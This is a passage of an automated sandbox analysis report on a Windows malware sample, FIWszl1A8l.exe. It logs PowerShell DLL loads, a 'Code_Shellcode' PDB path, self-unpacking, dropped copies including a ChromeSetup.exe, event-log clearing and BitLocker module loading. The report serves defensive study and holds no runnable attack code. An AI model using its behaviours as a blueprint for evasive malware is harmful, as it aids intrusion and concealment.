                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F5FB2C77-0E2F-4A16-A381-3E560C68BC83}\InProcServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: FIWszl1A8l.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                      Source: FIWszl1A8l.exeStatic file information: File size 3213672 > 1048576
                      Source: FIWszl1A8l.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x2c2200
                      Source: FIWszl1A8l.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                      Source: Binary string: UpdaterSetup.exe.pdb source: ChromeSetup[1].exe.0.dr, ChromeSetup.exe.0.dr
                      Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbBQ source: powershell.exe, 0000000D.00000002.1442464615.0000000006FC5000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbw source: powershell.exe, 0000000D.00000002.1442901248.0000000007013000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 0000000D.00000002.1416194201.0000000002A77000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \Release\Code_Shellcode.pdb source: FIWszl1A8l.exe, FIWszl1A8l.exe, 00000000.00000002.1734162605.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, FIWszl1A8l.exe, 00000000.00000002.1739013263.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                      Source: Binary string: \Release\Code_Shellcode.pdb,''GCTL source: FIWszl1A8l.exe, 00000000.00000002.1734162605.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, FIWszl1A8l.exe, 00000000.00000002.1739013263.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbl source: powershell.exe, 0000000D.00000002.1442901248.0000000007013000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: UpdaterSetup.exe.pdbP source: ChromeSetup[1].exe.0.dr, ChromeSetup.exe.0.dr
                      Source: Binary string: updater.exe.pdb source: ChromeSetup[1].exe.0.dr, ChromeSetup.exe.0.dr
                      Source: Binary string: updater.exe.pdbP source: ChromeSetup[1].exe.0.dr, ChromeSetup.exe.0.dr

                      Data Obfuscation

                      barindex
                      Detected unpacking (overwrites its own PE header)
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeUnpacked PE file: 0.2.FIWszl1A8l.exe.400000.0.unpack
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_2_02D07490 wsprintfW,LoadLibraryW,GetProcAddress,MultiByteToWideChar,swprintf,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,FreeLibrary,6_2_02D07490
                      Source: FIWszl1A8l.exe.0.drStatic PE information: real checksum: 0x318112 should be: 0x318989
                      Source: FIWszl1A8l.exeStatic PE information: real checksum: 0x318112 should be: 0x318989
                      Source: FIWszl1A8l.exeStatic PE information: section name: .didata
                      Source: FIWszl1A8l.exe.0.drStatic PE information: section name: .didata
                      Source: ChromeSetup[1].exe.0.drStatic PE information: section name: CPADinfo
                      Source: ChromeSetup[1].exe.0.drStatic PE information: section name: malloc_h
                      Source: ChromeSetup.exe.0.drStatic PE information: section name: CPADinfo
                      Source: ChromeSetup.exe.0.drStatic PE information: section name: malloc_h
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_044B632D push eax; ret 4_2_044B6341
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_044B3ACD push ebx; retf 4_2_044B3ADA
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_3_03FB8600 push ecx; ret 6_3_03FB8613
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_2_02D14345 push ecx; ret 6_2_02D14358
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_2_02D2A0B8 push eax; ret 6_2_02D2A119
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_2_02D2A168 push eax; ret 6_2_02D2A119
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_2_02D22450 push ebp; retf 6_2_02D22474
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_2_02D22470 push ebp; retf 6_2_02D22474
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_2_02D22471 push ebp; retf 6_2_02D22474
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_2_00979DF5 push ecx; ret 6_2_00979E08
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_2_0098FE9A push ecx; ret 6_2_0098FEBF
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_2_0092CAFF push eax; retf 6_2_0092CB00
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_2_0092CB07 pushad ; retf 6_2_0092CB08
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_2_0092CB0B push 701000CBh; retf 6_2_0092CB10
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_2_0092CB61 pushfd ; retf 6_2_0092CB64
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_2_00929DCC push ecx; ret 6_2_00929DDF
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_2_02833D04 push ecx; ret 6_2_02833D17
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_02C799C5 push esp; iretd 13_2_02C799C9
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeFile created: C:\Users\user\Downloads\ChromeSetup.exeJump to dropped file
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeFile created: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeJump to dropped file
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\ChromeSetup[1].exeJump to dropped file

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Loading BitLocker PowerShell Module
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_2_02D0B3C0 OpenEventLogW,OpenEventLogW,ClearEventLogW,CloseEventLog,6_2_02D0B3C0
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeKey value created or modified: HKEY_CURRENT_USER\Console\0 9e9e85e05ee16fc372a0c7df6549fbd4Jump to behavior
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
